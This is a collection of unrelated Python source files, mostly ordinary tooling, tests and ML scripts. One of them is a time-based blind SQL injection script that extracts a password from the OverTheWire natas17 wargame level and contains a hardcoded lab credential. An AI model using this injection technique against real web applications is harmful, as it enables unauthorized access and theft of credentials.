@click.version_option(version=__version__) def main( filesystem, link_dir, name, locator, temporary, installs, links, requirements, recreate, virtualenv_args, ): if name: if temporary: raise click.BadParameter( "specify only one of '-t / --temp / --temporary' or 'name'", ) virtualenv = locator.for_name(name=name) elif temporary: virtualenv = locator.temporary() click.echo(virtualenv.binary("python").dirname()) act = partial(virtualenv.recreate_on, filesystem=filesystem) elif len(installs) == 1: # When there's just one package to install, default to using that name. requirement, = installs name = Requirement(requirement).name virtualenv = locator.for_name(name=name) elif installs: raise click.BadParameter("A name is required.") elif len(links) == 1: # When there's just one binary to link, go for the gold. name, = installs = links virtualenv = locator.for_name(name=name) else: virtualenv = locator.for_directory(directory=Path.cwd()) if recreate or temporary: act = partial(virtualenv.recreate_on, filesystem=filesystem) else: act = virtualenv.create act(arguments=virtualenv_args) virtualenv.install(packages=installs, requirements=requirements) for link in links: filesystem.link( source=virtualenv.binary(name=link), to=link_dir.descendant(link), )
nilq/baby-python
python
from itsdangerous import json from models.vagas import VagasEmpregoModel class VagasEmpregoService: def buscar_vaga(self, vaga_id: int) -> dict: vaga = VagasEmpregoModel.procurar_vaga(vaga_id) return vaga def listar_vagas(self) -> list: lista_vagas = VagasEmpregoModel.listar_vagas() vagas = [vaga_model.json() for vaga_model in lista_vagas] return vagas def criar_vaga(self, dados: dict) -> dict: vaga = VagasEmpregoModel(**dados) try: print(vaga) resultado = vaga.salvar_vaga() print(resultado) except Exception as e: return {"msg": "Erro ao persistir vaga.", "error": e}, 500 return vaga.json() def deletar_vaga(self, vaga_id: int) -> dict: vaga = self.buscar_vaga(vaga_id) vaga_deletada = vaga vaga.deletar_vaga() return vaga_deletada def atualizar_vaga(self, dados: dict) -> dict: nova_vaga = {**dados} return nova_vaga
nilq/baby-python
python
import matplotlib; matplotlib.use('Agg')
from daft_builder import pgm
import pytest


def test_Param_init():
    param = pgm.Param(r"$y$", xy=(0.5, 0.5), of=["x"])
    assert param.name == "y"
    assert (param.x, param.y) == (0.5, 0.5)
    assert param.anchor_node is None
    assert param.edges_to == ["x"]


@pytest.mark.parametrize("of", [
    22, 22.1, -1, 0
])
def test_Param_init_referring_to_number_named_nodes(of):
    param = pgm.Param(r"$y$", xy=(1, 1), of=of)
    assert param.edges_to == [of]


def test_init_Param_of_multiple_nodes():
    param = pgm.Param(r"$y$", xy=(1, 1), of=["x", "w"])
    assert param.edges_to == ["x", "w"]


def test_Param_init_requires_valid_anchor():
    with pytest.raises(ValueError):
        pgm.Param(r"$y$", xy=(1, 1))


def test_Text_init():
    t = pgm.Text("some text", xy=(1, 1))
    assert t.name == "some text"
    assert t.kwargs['plot_params'] == {"ec": "none"}

    t = pgm.Text("some text", "t", xy=(1, 1))
    assert t.name == "t"
    assert t.kwargs['plot_params'] == {"ec": "none"}
nilq/baby-python
python
from .neurons import *
nilq/baby-python
python
#!/usr/bin/env python

__author__ = "Mari Wahl"
__copyright__ = "Copyright 2014"
__credits__ = ["Mari Wahl"]
__license__ = "GPL"
__version__ = "2.0"
__maintainer__ = "Mari Wahl"
__email__ = "marina.w4hl@gmail.com"

''' This should be automated; declaring every constant by hand like this is poor practice, but it is kept for historical reasons. '''

PERCENTAGE = 0.8
INPUT_FOLDER = '../../data/divide_train_test/'
OUTPUT_FOLDER = "../../data/normalize_data/"
NORM_TYPE = ['gauss', 'xmin', 'none']
nilq/baby-python
python
""" This file contains form classes for abstracting forms across picbackend app """ from django.forms import ModelForm from picmodels.models import NavMetricsLocation class NavMetricsLocationForm(ModelForm): # country = ModelChoiceField(queryset=Country.objects.all(), empty_label="Choose Country", to_field_name="name") # def __init__(self, *args, **kwargs): # super(NavMetricsLocationForm, self).__init__(*args, **kwargs) # self.fields['country'].label_from_instance = lambda obj: "%s" % obj.name class Meta: model = NavMetricsLocation fields = ["name", "address"]
nilq/baby-python
python
# Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ Optimize Queries Revision ID: 08447ab49999 Revises: 06bfbc92f67d Create Date: 2018-11-10 20:37:11.391545 """ from alembic import op revision = "08447ab49999" down_revision = "06bfbc92f67d" def upgrade(): op.create_index( op.f("ix_projects_sitemap_bucket"), "projects", ["sitemap_bucket"], unique=False ) op.create_index( op.f("ix_users_sitemap_bucket"), "users", ["sitemap_bucket"], unique=False ) op.create_index( "journakls_submitted_date_id_idx", "journals", ["submitted_date", "id"], unique=False, ) op.create_index(op.f("ix_projects_created"), "projects", ["created"], unique=False) def downgrade(): op.drop_index(op.f("ix_projects_created"), table_name="projects") op.drop_index("journakls_submitted_date_id_idx", table_name="journals") op.drop_index(op.f("ix_users_sitemap_bucket"), table_name="users") op.drop_index(op.f("ix_projects_sitemap_bucket"), table_name="projects")
nilq/baby-python
python
#************************************************************************** #* Copyright(c) 1998-2014, ALICE Experiment at CERN, All rights reserved. * #* * #* Author: The ALICE Off-line Project. * #* Contributors are mentioned in the code where appropriate. * #* * #* Permission to use, copy, modify and distribute this software and its * #* documentation strictly for non-commercial purposes is hereby granted * #* without fee, provided that the above copyright notice appears in all * #* copies and that both the copyright notice and this permission notice * #* appear in the supporting documentation. The authors make no claims * #* about the suitability of this software for any purpose. It is * #* provided "as is" without express or implied warranty. * #************************************************************************** from PWGJE.EMCALJetTasks.Tracks.analysis.base.Graphics import GraphicsObject,SinglePanelPlot from ROOT import TFile class ComparisonObject(object): """ Base entry type for object inside comparison data """ def __init__(self, data, style): self.__data = data self.__style = style def GetData(self): return self.__data def GetGraphicsObject(self): return GraphicsObject(self.__data, self.__style) def GetRootPrimitive(self): self.__data.SetName(self.GetObjectName()) return self.__data def Draw(self, pad, addToLegend = True): pad.DrawGraphicsObject(self.GetGraphicsObject(), addToLegend, self.GetLegendTitle()) def GetLegendTitle(self): """ To be implemented in inheriting classes """ return "" def GetObjectName(self): """ To be implemented in inheriting classes """ return "" class ComparisonData(object): """ General comparison data collection """ def __init__(self): """ Constructor """ self.__entries = [] def GetEntries(self): return self.__entries def AddEntry(self, entry): self.__entries.append(entry) def DrawObjects(self, pad, addToLegend = True): for entry in self.__entries: entry.Draw(pad, addToLegend) def GetListOfRootObjects(self): """ Get a list of root-primitive trigger efficiencies """ rootprimitives = [] for entry in self.__entries: rootprimitives.append(entry.GetRootPrimitive()) return rootprimitives class ComparisonPlot(SinglePanelPlot): """ General comparison plot type """ def __init__(self): """ Constructor """ SinglePanelPlot.__init__(self) self.__frame = None self._comparisonContainer = None # be specified in inheriting classes self.__legendAttributes = None self.__padattributes = {"logx":False, "logy":False, "gridx":False, "gridy":False} def SetFrame(self, frame): self.__frame = frame def SetLegendAttributes(self, xmin, ymin, xmax, ymax): self.__legendAttributes = {"xmin":xmin, "xmax":xmax, "ymin":ymin, "ymax":ymax} def SetPadAttributes(self, logx, logy, gridx, gridy): self.__padattributes["logx"] = logx self.__padattributes["logy"] = logy self.__padattributes["gridx"] = gridx self.__padattributes["gridy"] = gridy def _Create(self, canvasname, canvastitle): """ Make the plot """ self._OpenCanvas(canvasname, canvastitle) pad = self._GetFramedPad() if self.__padattributes["logx"]: pad.GetPad().SetLogx() if self.__padattributes["logy"]: pad.GetPad().SetLogy() pad.DrawFrame(self.__frame) doLegend = False if self.__legendAttributes: doLegend = True self._comparisonContainer.DrawObjects(pad, doLegend) if doLegend: pad.CreateLegend(self.__legendAttributes["xmin"], self.__legendAttributes["ymin"], self.__legendAttributes["xmax"], self.__legendAttributes["ymax"]) def WriteData(self, rootfilename): """ Write out trigger efficiency curves to a root file """ outputfile = 
TFile(rootfilename, "RECREATE") for rootprim in self._comparisonContainer.GetListOfRootObjects(): rootprim.Write() outputfile.Close()
nilq/baby-python
python
import re import difflib import collections from . import ComicBookCrawlerBase, ChapterItem, ComicBookItem, SearchResultItem from ..exceptions import ComicbookNotFound, ChapterNotFound class ComicBookCrawler(ComicBookCrawlerBase): SOURCE_NAME = '鼠绘漫画' SITE = "ishuhui" CHAPTER_INTERVAL_PATTERN = re.compile(r"^(?P<start_chapter_number>\d+)\-(?P<end_chapter_number>\d+)") COMIC_API_VER = None # source= qq/ishuhui CItem = collections.namedtuple("CItem", ["chapter_number", "title", "url", "source", "source_url"]) def __init__(self, comicid): super().__init__() self.comicid = comicid self.api_data = None # {int_chapter_number: CItem, } self.chapter_db = {} self.source_url = "https://www.ishuhui.com/comics/anime/{}".format(comicid) @property def api_url(self): # https://prod-api.ishuhui.com/ver/8a175090/anime/detail?id=1&type=comics&.json return "https://prod-api.ishuhui.com/ver/{ver}/anime/detail?id={comicid}&type=comics&.json"\ .format(ver=self.get_comics_api_ver(), comicid=self.comicid) @classmethod def get_comics_api_ver(cls): if cls.COMIC_API_VER is None: url = "https://prod-u.ishuhui.com/ver" data = cls.get_json(url) cls.COMIC_API_VER = data["data"]["comics"] return cls.COMIC_API_VER def get_api_data(self): if self.api_data is None: self.api_data = self.get_json(url=self.api_url) if not self.api_data.get("data"): msg = "资源未找到! site={} comicid={}".format(self.SITE, self.comicid) raise ComicbookNotFound(msg) return self.api_data def get_comicbook_item(self): api_data = self.get_api_data() name = api_data['data']['name'] desc = api_data['data']['desc'] or "" desc = desc.replace("<p>", "") desc = desc.replace("</p>", "") tag = api_data['data']['tag'] chapter_db = self.get_chapter_db() cover_image_url = api_data['data']['thumbComics'] author = api_data['data']['authorName'] chapters = [] for chapter_number, item in chapter_db.items(): chapter = ComicBookItem.create_chapter(chapter_number=chapter_number, title=item.title) chapters.append(chapter) return ComicBookItem(name=name, desc=desc, tag=tag, cover_image_url=cover_image_url, author=author, source_url=self.source_url, source_name=self.SOURCE_NAME, chapters=chapters) def get_chapter_item(self, chapter_number): chapter_db = self.get_chapter_db() if chapter_number not in chapter_db: msg = "资源未找到! 
site={} comicid={} chapter_number={}".format(self.SITE, self.comicid, chapter_number) raise ChapterNotFound(msg) item = chapter_db[chapter_number] if item.source == "qq": html = self.get_html(item.url) chapter_item = self.parser_qq_source(html, source_url=item.source_url) return chapter_item if item.source == "ishuhui": chapter_api_data = self.get_json(item.url) chapter_item = self.parser_ishuihui_source(chapter_api_data, source_url=item.source_url) return chapter_item def get_chapter_db(self): if self.chapter_db: return self.chapter_db api_data = self.get_api_data() for interval, items in api_data['data']['comicsIndexes']['1']['nums'].items(): for str_chapter_number, chapter_data_sources in items.items(): # str_chapter_number = "1-8" # str_chapter_number = "9-17" r = self.CHAPTER_INTERVAL_PATTERN.search(str_chapter_number) if r: chapter_number = int(r.group("start_chapter_number")) else: chapter_number = int(str_chapter_number) # chapter_source = {int_source_id : chapter_data} chapter_source = {} for chapter_data in chapter_data_sources: source_id = chapter_data['sourceID'] chapter_source[source_id] = chapter_data # sourceID = 2 腾讯漫画源 if 2 in chapter_source: chapter_data = chapter_source[2] # http://ac.qq.com/ComicView/index/id/505430/cid/1 qq_source_url = chapter_data['url'] qq_source_url = qq_source_url.replace("http://", "https://", 1) self.chapter_db[chapter_number] = self.CItem(chapter_number=chapter_number, title=chapter_data['title'], url=qq_source_url, source_url=qq_source_url, source="qq") continue # sourceID = 1/5/7 站内资源 chapter_data = None if 1 in chapter_source: chapter_data = chapter_source[1] elif 5 in chapter_source: chapter_data = chapter_source[5] elif 7 in chapter_source: chapter_data = chapter_source[7] if chapter_data: cid = chapter_data['id'] # 页面 https://www.ishuhui.com/comics/detail/11196 # api https://prod-api.ishuhui.com/comics/detail?id=11196 url = "https://prod-api.ishuhui.com/comics/detail?id={}".format(cid) source_url = "https://www.ishuhui.com/comics/detail/{}".format(cid) self.chapter_db[chapter_number] = self.CItem(chapter_number=chapter_number, title=chapter_data['title'], url=url, source="ishuhui", source_url=source_url) continue # sourceID = 6 百度网盘 if 6 in chapter_source: pass return self.chapter_db @classmethod def parser_ishuihui_source(cls, chapter_api_data, source_url=None): # https://prod-api.ishuhui.com/comics/detail?id=11196 image_urls = [item['url'] for item in chapter_api_data['data']['contentImg']] chapter_title = chapter_api_data['data']['title'] chapter_number = chapter_api_data['data']['numberStart'] return ChapterItem(chapter_number=chapter_number, title=chapter_title, image_urls=image_urls, source_url=source_url) @classmethod def parser_qq_source(self, chapter_page_html, source_url=None): # https://ac.qq.com/ComicView/index/id/505430/cid/1 from .qq import ComicBookCrawler as QQComicBookCrawler return QQComicBookCrawler.parser_chapter_page(chapter_page_html, source_url=source_url) @classmethod def search(cls, name): url = "https://prod-api.ishuhui.com/ver/{}/comics/list?page=1&pageSize=100&toView=true&.json"\ .format(cls.get_comics_api_ver()) data = cls.get_json(url) rv = [] for item in data["data"]["data"]: comicid = item.get('animeID') _name = item.get('title') # cover_image_url = item.get('thumb') cover_image_url = item.get('animeThumb') source_url = "https://www.ishuhui.com/comics/anime/{}".format(comicid) search_result_item = SearchResultItem(site=cls.SITE, name=_name, comicid=comicid, cover_image_url=cover_image_url, 
source_url=source_url) rv.append(search_result_item) return sorted(rv, key=lambda x: difflib.SequenceMatcher(None, name, x.name).ratio(), reverse=True)
nilq/baby-python
python
import paddle
import pit
import numpy as np
from reprod_log import ReprodLogger
# import argparse
from DeiT.regnet import build_regnet as build_teacher_model
from DeiT.losses import DistillationLoss, SoftTargetCrossEntropyLoss

reprod_logger = ReprodLogger()

# Define and load the model
model = pit.pit_ti(pretrained=False)
model.set_state_dict(paddle.load('./pit_ti_730.pdparams'))

# Load the data
fake_data = np.load("fake_data.npy")
fake_label = np.load("fake_label.npy")
images = paddle.to_tensor(fake_data)
target = paddle.to_tensor(fake_label)

# Define the optimizer
model_without_ddp = model
# optimizer = create_optimizer(args, model_without_ddp)
optimizer = paddle.optimizer.AdamW(
    parameters=model.parameters(),
    learning_rate=0.0005,
    beta1=0.9,
    beta2=0.999,
    weight_decay=0.05,
    epsilon=0.1,
    grad_clip=None,
)

model.eval()  # dropout layers are handled manually
loss_list = []
criterion = SoftTargetCrossEntropyLoss()
teacher_model = build_teacher_model()
# print(teacher_model)

for i in range(5):
    output = model(images)
    dis = DistillationLoss(criterion, teacher_model, "none", 0.5, 1.0)
    # print('out-before: ', out.detach())
    # print('target-before: ', paddle.to_tensor(fake_label).detach())
    loss = dis(images, output, target.astype('float64'))
    # loss = DistillationLoss(fake_data, output, target)
    loss.backward()
    optimizer.step()
    optimizer.clear_grad()
    loss_list.append(loss.detach())
    print("loss= ", loss.detach())
    reprod_logger.add(f"loss_{i}", loss.cpu().detach().numpy())

reprod_logger.save('bp_align_paddle.npy')
nilq/baby-python
python
import copy import itertools from taichi.core import ti_core as _ti_core import taichi as ti # Helper functions def get_rel_eps(): arch = ti.cfg.arch if arch == ti.opengl: return 1e-3 elif arch == ti.metal: # Debatable, different hardware could yield different precisions # On AMD Radeon Pro 5500M, 1e-6 works fine... # https://github.com/taichi-dev/taichi/pull/1779 return 1e-4 return 1e-6 def approx(expected, **kwargs): '''Tweaked pytest.approx for OpenGL low precisions''' import pytest class boolean_integer: def __init__(self, value): self.value = value def __eq__(self, other): return bool(self.value) == bool(other) def __ne__(self, other): return bool(self.value) != bool(other) if isinstance(expected, bool): return boolean_integer(expected) kwargs['rel'] = max(kwargs.get('rel', 1e-6), get_rel_eps()) return pytest.approx(expected, **kwargs) def allclose(x, y, **kwargs): '''Same as: x == approx(y, **kwargs)''' return x == approx(y, **kwargs) def make_temp_file(*args, **kwargs): '''Create a temporary file''' import os from tempfile import mkstemp fd, name = mkstemp(*args, **kwargs) os.close(fd) return name class TestParam: def __init__(self, value, required_extensions): self._value = value self._required_extensions = required_extensions @property def value(self): return self._value @property def required_extensions(self): return self._required_extensions _test_features = { #"packed": # [TestValue(True, []), # TestValue(False, [])], "dynamic_index": [TestParam(True, [ti.extension.dynamic_index]), TestParam(False, [])] } def test(arch=None, exclude=None, require=None, **options): ''' .. function:: ti.test(arch=[], exclude=[], require=[], **options) :parameter arch: backends to include :parameter exclude: backends to exclude :parameter require: extensions required :parameter options: other options to be passed into ``ti.init`` ''' if arch is None: arch = [] if exclude is None: exclude = [] if require is None: require = [] if not isinstance(arch, (list, tuple)): arch = [arch] if not isinstance(exclude, (list, tuple)): exclude = [exclude] if not isinstance(require, (list, tuple)): require = [require] supported_archs = ti.supported_archs() if len(arch) == 0: arch = supported_archs else: arch = list(filter(lambda x: x in supported_archs, arch)) def decorator(foo): import functools @functools.wraps(foo) def wrapped(*args, **kwargs): arch_params_sets = [arch, *_test_features.values()] arch_params_combinations = list( itertools.product(*arch_params_sets)) for arch_params in arch_params_combinations: req_arch, req_params = arch_params[0], arch_params[1:] if (req_arch not in arch) or (req_arch in exclude): continue if not all( _ti_core.is_extension_supported(req_arch, e) for e in require): continue skip = False current_options = copy.deepcopy(options) for feature, param in zip(_test_features, req_params): value = param.value required_extensions = param.required_extensions if current_options.get(feature, value) != value or any( not _ti_core.is_extension_supported(req_arch, e) for e in required_extensions): skip = True else: # Fill in the missing feature current_options[feature] = value if skip: continue ti.init(arch=req_arch, **current_options) foo(*args, **kwargs) ti.reset() return wrapped return decorator __all__ = [ 'get_rel_eps', 'approx', 'allclose', 'make_temp_file', 'test', ]
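# Usage sketch for the helpers above (illustrative only; it assumes this module is
# re-exported as `ti.test`, as the docstring of `test` suggests):
#
#   @ti.test(arch=[ti.cpu, ti.cuda])
#   def test_third():
#       x = ti.field(ti.f32, shape=())
#
#       @ti.kernel
#       def run():
#           x[None] = 1.0 / 3.0
#
#       run()
#       assert x[None] == approx(1.0 / 3.0)
#
# The decorator re-runs the test body for every selected backend and feature
# combination, calling ti.init() before and ti.reset() after each run.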
nilq/baby-python
python
from lxml import etree, objectify class norm_attribute: def __remove_attributes_node(self, mt_node): if not mt_node.attrib: return True for at in mt_node.attrib.keys(): del mt_node.attrib[at] def __remove_attributes_tree(self, mt_tree): self.__remove_attributes_node(mt_tree) for child in mt_tree: self.__remove_attributes_tree(child) def normalize(self, mt_string): mt_tree = etree.fromstring(mt_string) self.__remove_attributes_tree(mt_tree) objectify.deannotate(mt_tree, cleanup_namespaces=True) return etree.tostring(mt_tree)
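# Minimal usage sketch (the XML below is illustrative and not tied to any schema):
# normalize() strips every attribute from every element and returns the
# re-serialised tree.
if __name__ == '__main__':
    sample = b'<root version="1.0"><child id="a">text</child></root>'
    print(norm_attribute().normalize(sample))
    # expected output: b'<root><child>text</child></root>'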
nilq/baby-python
python
import os from pysigtool import extract_authenticode def test_extract_authenticode() -> None: script_dir: str = os.path.abspath(os.path.dirname(__file__)) input_bin: str = os.path.join(script_dir, "msvcr120.dll") output_der: str = os.path.join( script_dir, "msvcr120.dll".replace(".", "_") + ".der" ) ref_der: str = os.path.join(script_dir, "ref.der") extract_authenticode(input_bin) with open(output_der, "rb") as fin0, open(ref_der, "rb") as fin1: assert fin0.read() == fin1.read()
nilq/baby-python
python
''' Export/Spreadsheet/spreadsheetrow _________________________________ Base object for generating spreadsheet data rows. :copyright: (c) 2015 The Regents of the University of California. :license: GNU GPL, see licenses/GNU GPLv3.txt for more details. ''' # load modules/submodules from xldlib.qt.objects import base # DATA # ---- ATTR_TYPES = { 'search': "Search Name", 'fraction': "File Name", 'project': "Project Name", 'ms1': "MS1 Scans Name", 'scans': "MS Scans Name", 'precursor': "Precursor Scans Name", 'product': "Product Scans Name", 'matched': "Matched Output Name", 'runtime': "Runtime" } DATA_TYPES = { 'num': "Product Scan", 'peptide': "DB Peptide", 'start': "Start", 'id': "Subunit", 'name': "Subunit Name", 'preferred': "Common/Gene Name", 'mz': "MS3 m/z", 'z': "MS3 z", 'ppm': "MS3 PPM", 'score': "MS3 Score", 'ev': "MS3 EV", 'rank': "Search Rank", 'precursor_num': "Precursor Scan", 'precursor_rt': "Precursor RT", 'precursor_mz': "MS2 m/z", 'precursor_z': "MS2 z", # MS1 data is added after data extraction # 'ms1_num': "MS1 Scan", # 'ms1_rt': "MS1 RT" } REPORTER_TYPES = { 'ratio': "{reporterion} Ratios", 'mz': "{reporterion} m/z", 'intensity': "{reporterion} Intensity", } # BASE # ---- class SpreadsheetRow(base.BaseObject): '''Shared methods for processing invididual rows of spreadsheet data''' def __init__(self, row): super(SpreadsheetRow, self).__init__() self.row = row source = self.app.discovererthread self.reporterion = source.matched.reporterion.name # SETTERS def setattrs(self, values): '''Sets the file data for a given scan''' for key, column in ATTR_TYPES.items(): values[column] = [self.row.data['attrs'].get(key, '')] def setdata(self, values, indexes): '''Converts the variable length array types to spreadsheet values''' for key, column in DATA_TYPES.items(): values[column] = list(self.row.data.getcolumn(indexes, key)) def setreporter(self, values, indexes): '''Converts the report ion data to spreadsheet values''' items = list(self.row.data.getcolumn(indexes, 'reporter')) for key, column in REPORTER_TYPES.items(): strs = [i.tostr(key) if i is not None else '' for i in items] formatted = column.format(reporterion=self.reporterion) values[formatted] = strs def setreporternull(self, values, indexes): '''Sets null values if report ion quantitation is inactive''' for key, column in REPORTER_TYPES.items(): formatted = column.format(reporterion=self.reporterion) values[formatted] = [float('nan')] * len(indexes)
nilq/baby-python
python
expected_output={ 'tunnel_id': { 1: { 'active_time': 2856, 'auth_sign': 'psk', 'auth_verify': 'psk', 'ce_id': 1406, 'cisco_trust_security_sgt': 'disabled', 'dh_grp': 20, 'dpd_configured_time': 10, 'dynamic_route_update': 'enabled', 'encryption': 'aes-gcm', 'extended_authentication': 'not configured', 'fragmentation': 'not configured', 'fvrf': 'none', 'hash': 'none', 'initiator_of_sa': 'yes', 'ivrf': 'none', 'keysize': 256, 'life_time': 86400, 'local': '4.4.4.1/4500', 'local_id': '4.4.4.1', 'local_next_msg_id': 288, 'local_reg_msg_id': 288, 'local_req_queued': 288, 'local_spi': '409A5870608E1C87', 'local_window': 5, 'nat_t': 'detected inside', 'prf': 'sha384', 'pushed_ip': '66.6.6.4', 'remote': '10.1.1.1/4500', 'remote_id': '10.1.1.1', 'remote_next_msg_id': 285, 'remote_req_msg_id': 285, 'remote_req_queued': 285, 'remote_spi': '20858C98BE7EE1A9', 'remote_subnets': [], 'remote_window': 5, 'retry': 2, 'session_id': 60, 'status': 'ready', 'status_description': 'negotiation done', }, }, }
nilq/baby-python
python
#!/usr/bin/env python import requests possible_chars = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ' password = '8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw' auth=('natas17', password) used_chars = '' for char in possible_chars: payload = {'username': ('natas18" AND password LIKE BINARY "%%%c%%" and sleep(5) and "1"="1' % char)} try: r = requests.post('http://natas17.natas.labs.overthewire.org/index.php', auth=auth, data=payload, timeout=1) except requests.exceptions.Timeout: used_chars += char print used_chars cracked_pass = '' for i in range(32): print i for char in used_chars: new_pass = cracked_pass + char payload = {'username': ('natas18" AND password LIKE BINARY "%s%%" and sleep(5) and "1"="1' % new_pass)} try: r = requests.post( 'http://natas17.natas.labs.overthewire.org/index.php', auth=auth, data=payload, timeout=1) except requests.exceptions.Timeout: cracked_pass += char print cracked_pass + "*" * (32 - len(cracked_pass)) break
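# How this works: the login check gives no usable output, so the script relies on a
# time-based blind SQL injection. The first loop injects sleep(5) guarded by
# LIKE BINARY "%<char>%" to learn which characters appear anywhere in the target
# password (a request that hits the 1-second timeout means the guard matched).
# The second loop reuses that reduced alphabet to extend the known prefix one
# character at a time with LIKE BINARY "<prefix>%" until all 32 characters are found.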
nilq/baby-python
python
from .data_wrangling import dip2strike
from .data_wrangling import strike2dipaz
from .data_wrangling import xyzinterp
from .data_wrangling import linear_interpolate_2dp
from .geometric_bias import unitvectorx
from .geometric_bias import unitvectory
from .geometric_bias import unitvectorz
from .geometric_bias import isogeniccontour
from .mohr_plot import sigma_m
from .mohr_plot import tau_s
from .mohr_plot import sigma_n
from .mohr_plot import mohr3d
from .hoop_stress import thermal_stress
from .hoop_stress import theta
from .hoop_stress import effhoopstress
from .transform_stress_tensor import Rs
from .transform_stress_tensor import Rf
from .transform_stress_tensor import rake
from .transform_stress_tensor import Rt
from .transform_stress_tensor import fracture_sn_tau
from .stress_models import linear_Sv
from .stress_polygon import minstress
from .stress_polygon import maxstress
from .stress_polygon import poly

__version__ = '0.1-dev'

__all__ = [
    'dip2strike',  # data_wrangling
    'strike2dipaz',
    'xyzinterp',
    'linear_interpolate_2dp',
    'unitvectorx',  # geometric_bias
    'unitvectory',
    'unitvectorz',
    'isogeniccontour',
    'sigma_m',  # mohr_plot
    'tau_s',
    'sigma_n',
    'mohr3d',
    'thermal_stress',  # hoop_stress
    'theta',
    'effhoopstress',
    'Rs',  # transform_stress_tensor
    'Rf',
    'rake',
    'Rt',
    'fracture_sn_tau',
    'linear_Sv',  # stress_models
    'minstress',
    'maxstress',
    'poly'
]
nilq/baby-python
python
from .base import Widget class RectangleWidget(Widget): def __init__(self, size, position=(0, 0)): super().__init__(position) self.size = size def draw(self, window): width, height = self.extent(window) window.rectangle(self.x, self.y, self.x + width - 1, self.y + height - 1) def extent(self, _): return self.size
nilq/baby-python
python
import sys import pandas as pd import numpy as np import torch from torch import nn from torch.utils.data import random_split, DataLoader from utils import ( read_glove_vector, get_one_hot_matrix, get_glove_matrix, create_emb_layer, ) from dataset import UtteranceSlotDataset from train import train from gpu import device from models import BaselineModel, RNNTwoLayerModel, GRUModel, LSTMModel # Get the raw data as pandas DataFrame train_df = pd.read_csv("hw_3_train_data.csv") # Use dataset object for preprocessing the raw data train_utterances = list(train_df["utterances"]) train_slots = list(train_df["IOB Slot tags"]) utterance_slot_dataset = UtteranceSlotDataset( train_utterances, train_slots, seq_len=int(np.max([len(sent.split()) for sent in train_utterances])) + 10, ) # split the training data into training set and validation set val_len = int(len(utterance_slot_dataset) * 0.3) train_set, val_set = random_split( utterance_slot_dataset, [len(utterance_slot_dataset) - val_len, val_len] ) # Define Global hyperparameters ## Model num_classes = len(utterance_slot_dataset.slot2idx) seq_len = utterance_slot_dataset.seq_len ## Training batch_size = 2048 # with splitting (for validation) train_loader = DataLoader( dataset=train_set, batch_size=batch_size, shuffle=True, ) # without splitting (for output test result) all_train_loader = DataLoader( dataset=utterance_slot_dataset, batch_size=batch_size, shuffle=True, ) if __name__ == "__main__": args = sys.argv embedding = args[1] model_type = args[2] train_mode = args[3] n_epochs = int(args[4]) weight_matrix = None if embedding == "one_hot": weight_matrix = get_one_hot_matrix(utterance_slot_dataset.vocab) elif embedding == "glove": glove_map = read_glove_vector("glove.6B.50d.txt") weight_matrix = get_glove_matrix( glove_map, utterance_slot_dataset.vocab ) elif embedding == "glove_100d": glove_100d_map = read_glove_vector("glove.6B.100d.txt") weight_matrix = get_glove_matrix( glove_100d_map, utterance_slot_dataset.vocab ) # create the embedding layer emb_layer, num_embeddings, embedding_dim = create_emb_layer(weight_matrix) # select models model = None if model_type == "baseline_rnn": model = BaselineModel( input_size=embedding_dim, output_size=num_classes, seq_len=seq_len, emb_layer=emb_layer, ).to(device) elif model_type == "2_layer_rnn": model = RNNTwoLayerModel( input_size=embedding_dim, hidden_size=32, output_size=num_classes, seq_len=seq_len, emb_layer=emb_layer, ).to(device) elif model_type == "gru": model = GRUModel( input_size=embedding_dim, output_size=num_classes, seq_len=seq_len, emb_layer=emb_layer, ).to(device) elif model_type == "lstm": model = LSTMModel( input_size=embedding_dim, output_size=num_classes, seq_len=seq_len, emb_layer=emb_layer, ).to(device) loader = None if train_mode == "validate": loader = train_loader elif train_mode == "all": loader = all_train_loader reports = train( model=model, n_epochs=n_epochs, data_loader=loader, loss_func=nn.CrossEntropyLoss(), optimizer=torch.optim.Adam(model.parameters(), lr=0.005), val_set=val_set, dataset=utterance_slot_dataset, is_plot=True, plot_name=f"{model_type}_{embedding}", ) best_idx = int(np.argmax([report[1]["accuracy"] for report in reports])) final_val_report = reports[best_idx][1] final_val_joint_accuracy = reports[best_idx][3] print("Accuracy: ", final_val_report["accuracy"]) print("Macro F1-Score: ", final_val_report["macro avg"]["f1-score"]) print("Weighted F1-Score: ", final_val_report["weighted avg"]["f1-score"]) print("Joint Accuracy: ", final_val_joint_accuracy) 
print("Best Epoch: ", best_idx * 10)
nilq/baby-python
python
from bokeh.models import FuncTickFormatter import bokeh.palettes import numpy as np logFmtr = FuncTickFormatter(code=""" var trns = [ '\u2070', '\u00B9', '\u00B2', '\u00B3', '\u2074', '\u2075', '\u2076', '\u2077', '\u2078', '\u2079']; var tick_power = Math.floor(Math.log10(tick)); var tick_mult = Math.pow(10, Math.log10(tick) - tick_power); var ret = ''; if (tick_mult > 1.) { if (Math.abs(tick_mult - Math.round(tick_mult)) > 0.05){ ret = tick_mult.toFixed(1) + '\u22C5'; } else { ret = tick_mult.toFixed(0) +'\u22C5'; } } ret += '10'; if (tick_power < 0){ ret += '\u207B'; tick_power = -tick_power; } power_digits = [] while (tick_power > 9){ power_digits.push( tick_power - Math.floor(tick_power/10)*10 ) tick_power = Math.floor(tick_power/10) } power_digits.push(tick_power) for (i = power_digits.length-1; i >= 0; i--){ ret += trns[power_digits[i]]; } return ret; """) pal = bokeh.palettes.colorblind['Colorblind'][8] pl = [pal[0], pal[1], pal[3]] pl.extend(pal[4:8]) pl.append('#d62728') pal = pl def plot_gaussian(plot, mup, Sigp, Sig, color, dotsize, linewidth, dotalpha, linealpha, line_dash, name): plot.circle(mup[0], mup[1], color=color, size=dotsize, alpha=dotalpha) t = np.linspace(0., 2*np.pi, 100) t = np.array([np.cos(t), np.sin(t)]) t = 3*np.linalg.cholesky(Sigp+Sig).dot(t) + mup[:, np.newaxis] plot.line(t[0, :], t[1, :], color=color, line_width=linewidth, alpha=linealpha, line_dash=line_dash, legend=name) def plot_meanstd(plot, x, ys, color, linewidth, alpha, line_dash, name): plot.line(x, ys.mean(axis=0), color=color, line_width=linewidth, 